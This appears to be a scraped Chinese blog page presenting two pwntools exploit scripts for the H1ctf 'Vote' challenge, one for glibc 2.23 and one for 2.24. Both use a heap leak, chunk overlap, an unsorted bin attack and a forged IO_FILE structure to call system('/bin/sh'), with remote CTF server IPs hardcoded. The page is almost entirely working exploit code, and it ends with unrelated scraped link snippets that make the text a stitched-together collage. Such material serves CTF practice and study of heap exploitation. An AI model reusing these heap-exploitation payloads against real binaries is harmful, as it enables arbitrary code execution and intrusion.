H1ctf-Vote
用来练习IO_FILE利用
glibc-2.23
# coding:utf-8
from pwn import *
from FILE import *
context.arch = 'amd64'
libc = ELF("/home/moonagirl/moonagirl/libc/libc_local_x64")
LOCAL = 1
if LOCAL:
# context.log_level = 'debug'
io = process('./vote')
main_arena_off = libc.symbols['__malloc_hook'] + 0x68
else:
main_arena_off = 0x3c4b78
#io = remote("47.90.103.10", 6000)
io = remote("47.97.190.1", 6000) def mmenu(choice):
io.recvuntil("Action: ")
io.sendline(str(choice)) def create(msize, content):
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(msize))
io.recvuntil("Please enter the name: ")
io.send(content) def show(idx):
mmenu(1)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def vote(idx):
mmenu(2)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def result():
mmenu(3) def vcancel(idx):
mmenu(4)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def pwnit():
create(0xE8, 'a0\n')
create(0x18, 'a1\n')
create(0xE8, 'a2\n')
create(0xE8, 'a3\n')
pay4load = '4'*0x180 + p64(0) + p64(0x81) + '\n'
create(0x208, pay4load)
create(0x30, 'a5\n')
vcancel(0)
vcancel(2)
# io.interactive()
show(0)
io.recvuntil("count: ")
libc.address = int(io.recvline()[:-1]) - main_arena_off
log.success("libc address: " + hex(libc.address))
io.recvuntil("time: ")
heap_address = int(io.recvline()[:-1]) - 0x130
log.success("heap address: " + hex(heap_address))
vcancel(3)
# overlap
fake_chunk = '6'*0xE0
fake_chunk += p64(0) + p64(0x2A1) # change size bigger
fake_chunk += p64(0xFFFFFFFFFFFFFFFF) + p64(0x555555)
fake_chunk += '\n'
create(0x1E8, fake_chunk) # 6
create(0xE8, 'a7\n') # clear unsorted bin
vcancel(3)
vcancel(4) # now unsorted bin have 2 chunks
# unsorted bin attack
payload = 'a'*0xE0
vtable_addr = heap_address + 0x410 fake_file = IO_FILE_plus_struct()
fake_file._flags = u64("/bin/sh\x00")
fake_file._IO_read_ptr = 0x61
fake_file._IO_read_base = libc.symbols['_IO_list_all'] - 0x10
fake_file._IO_write_base = 0
fake_file._IO_write_ptr = 1
fake_file.vtable = vtable_addr payload += str(fake_file) payload += p64(1)
payload += p64(2)
payload += p64(3)
payload += p64(libc.symbols["system"])
payload += '\n'
create(0x288, payload) # size 0x2A1
# now chunk3 removed from unsorted bin, unsorted bin only has chunk4
pause()
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(48))
io.interactive() if __name__ == "__main__":
pwnit()
pause()
glibc-2.24
# coding:utf-8
from pwn import *
from FILE import *
context.arch = 'amd64'
libc = ELF("./libc-2.24.so")
LOCAL = 1
if LOCAL:
# context.log_level = 'debug'
io = process('./vote',env={"LD_PRELOAD":"./libc-2.24.so"})
# __malloc_hook+68
main_arena_off = libc.symbols['__malloc_hook'] + 0x68
else:
main_arena_off = 0x3c4b78
#io = remote("47.90.103.10", 6000)
io = remote("47.97.190.1", 6000)
def z(a=''):
gdb.attach(io,a)
if a == '':
raw_input()
def mmenu(choice):
io.recvuntil("Action: ")
io.sendline(str(choice)) def create(msize, content):
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(msize))
io.recvuntil("Please enter the name: ")
io.send(content) def show(idx):
mmenu(1)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def vote(idx):
mmenu(2)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def result():
mmenu(3) def vcancel(idx):
mmenu(4)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def pwnit():
create(0xE8, 'a0\n')
create(0x18, 'a1\n')
create(0xE8, 'a2\n')
create(0xE8, 'a3\n')
pay4load = '4'*0x180 + p64(0) + p64(0x81) + '\n'
create(0x208, pay4load)
create(0x30, 'a5\n')
vcancel(0)
vcancel(2)
show(0)
io.recvuntil("count: ")
libc_base = int(io.recvline()[:-1]) - main_arena_off
io.recvuntil("time: ")
heap_address = int(io.recvline()[:-1]) - 0x130
system = libc.symbols['system']
_IO_list_all= libc.symbols['_IO_list_all']
binsh = libc.search('/bin/sh\x00').next()
_IO_str_jumps = 0x3BE4C0 + libc_base system = libc_base+libc.symbols['system']
_IO_list_all=libc_base+libc.symbols['_IO_list_all']
# _IO_str_jumps = libc_base+libc.symbols['_IO_str_jumps']
binsh = libc_base+libc.search('/bin/sh\x00').next() vcancel(3)
# overlap
fake_chunk = '6'*0xE0
fake_chunk += p64(0) + p64(0x2A1) # change size bigger
fake_chunk += p64(0xFFFFFFFFFFFFFFFF) + p64(0x555555)
fake_chunk += '\n'
create(0x1E8, fake_chunk) # 6 create(0xE8, 'a7\n') # clear unsorted bin
vcancel(3)
vcancel(4) # now unsorted bin have 2 chunks
# unsorted bin attack
payload = 'a'*0xE0
fake_file = IO_FILE_plus_struct()
fake_file._flags = 0
fake_file._IO_read_ptr = 0x61
fake_file._IO_read_base =_IO_list_all-0x10
fake_file._IO_buf_base = binsh
fake_file._mode = 0
fake_file._IO_write_base = 0
fake_file._IO_write_ptr = 1
fake_file.vtable = _IO_str_jumps-8
payload+=str(fake_file).ljust(0xe8,'\x00')+p64(system) create(0x288, payload) # size 0x2A1
# io.interactive()
# pause()
create(0, 'get shell')
io.interactive()
if __name__ == "__main__":
pwnit()
# pause()
.
H1ctf-Vote的更多相关文章
- BZOJ-1934 Vote 善意的投票 最大流+建图
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 64 MB Submit: 1551 Solved: 951 [Submit][S ...
- bzoj1934: [Shoi2007]Vote 善意的投票
最大流..建图方式都是玄学啊.. //Dinic是O(n2m)的. #include<cstdio> #include<cstring> #include<cctype& ...
- 最小投票BZOJ 1934([Shoi2007]Vote 善意的投票-最小割)
上班之余抽点时间出来写写博文,希望对新接触的朋友有帮助.今天在这里和大家一起学习一下最小投票 1934: [Shoi2007]Vote 好心的投票 Time Limit: 1 Sec Memory L ...
- [POLITICS] S Korea lawmakers vote to impeach leader
South Korea's Parliament has voted to impeach President Park Geun-hye. The National Assembly motion ...
- BZOJ 1934: [Shoi2007]Vote 善意的投票 最小割
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 256 MB 题目连接 http://www.lydsy.com/JudgeOnl ...
- A Linear Time Majority Vote Algorithm
介绍一种算法,它可以在线性时间和常数空间内,在一个数组内找出出现次数超过一半的某个数字. 要解决这个问题并不难,可以使用排序或哈希,但是这两种算法都不能同时满足时间或空间的要求. 然而,该算法(A L ...
- 11gR2更换OCR和VOTE
11gR2开始,OCR和VOTE它们被存储在ASM磁盘组,因此,更换OCR有两种方法,第一是使用ASM磁盘组drop disk数据重组后,另一种方法是OCR迁移到另一个磁盘组 第一种:add disk ...
- WeMall微商城源码投票插件Vote的主要源码
WeMall微信商城源码投票插件Vote,用于商城的签到系统,分享了部分比较重要的代码,供技术员学习参考 AdminController.class.php <?php namespace Ad ...
- 1934: [Shoi2007]Vote 善意的投票
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 64 MBSubmit: 1174 Solved: 723[Submit][S ...
- Boyer-Moore Majority Vote Algorithm
介绍算法之前, 我们来看一个场景, 假设您有一个未排序的列表.您想知道列表中是否存在一个数量占列表的总数一半以上的元素, 我们称这样一个列表元素为 Majority 元素.如果有这样一个元素, 求出它 ...
随机推荐
- shell学习(11)- seq
今天是五一劳动节,窗户外边,草长莺飞,惠风和畅,但坐在办公室里值班也需要做点事情,今天就写写seq的用法. 作用:用于以指定增量从首数开始打印数字到尾数,即产生从某个数到另外一个数之间的所有整数,并且 ...
- 《SQL 进阶教程》 case:练习题1-1-3 用 ORDER BY 指定顺序进行排序
select name from greatestsORDER BY case when name ='B' then 1 when name ='A' then 2 when name ='D' t ...
- 点击对应的a标签返回相应的第几个
面试中遇到的问题,前两天一直没有解决,今天想想还是得要想办法才行,其实仔细想的话很简单,惭愧啊,面试的时候没有做出来! 题目是这样的,如果一个body中有5个a标签,当我们点击对应的a标签时,aler ...
- EcmaScript学习
1.eval: ts: declare function eval(x: string): any; js: /** @param {*} x @return {Object} */ eval = f ...
- 打开powerDesigner时,创建table对应的自动生成sql语句没有注释
在创建pdm时由于需要在name列填写的是以后要在表中创建的注释信息,comment中则写的说明信息字数比较多.默认情况下在生成建表sql时不能将name生成注释信息,进行如下设置可以讲name生成注 ...
- HDU 6447 YJJ’s Salesman (树状数组 + DP + 离散)
题意: 二维平面上N个点,从(0,0)出发到(1e9,1e9),每次只能往右,上,右上三个方向移动, 该N个点只有从它的左下方格点可达,此时可获得收益.求该过程最大收益. 分析:我们很容易就可以想到用 ...
- CAS操作
CAS操作: Compare and Swap,比较并操作,CPU指令,在大多数处理器架构,包括IA32.Space中采用的都是CAS指令,CAS的语义是“我认为V的值应该为A,如果是,那么将V的值更 ...
- 017 Letter Combinations of a Phone Number 电话号码的字母组合
给定一个数字字符串,返回数字所有可能表示的字母组合. 输入:数字字符串 "23"输出:["ad", "ae", "af" ...
- mysql 位操作支持
mysql 支持位操作. & 位与 | 位或 例如:update car_ins_fee_entity set change_status=(change_status | 1) where ...
- 搭建Node.js Redis开发环境
创建项目 初始化为node项目 $npm init 安装redis 安装@types/node, @types/redis, typescript 初始化TypeScript 配置ts ...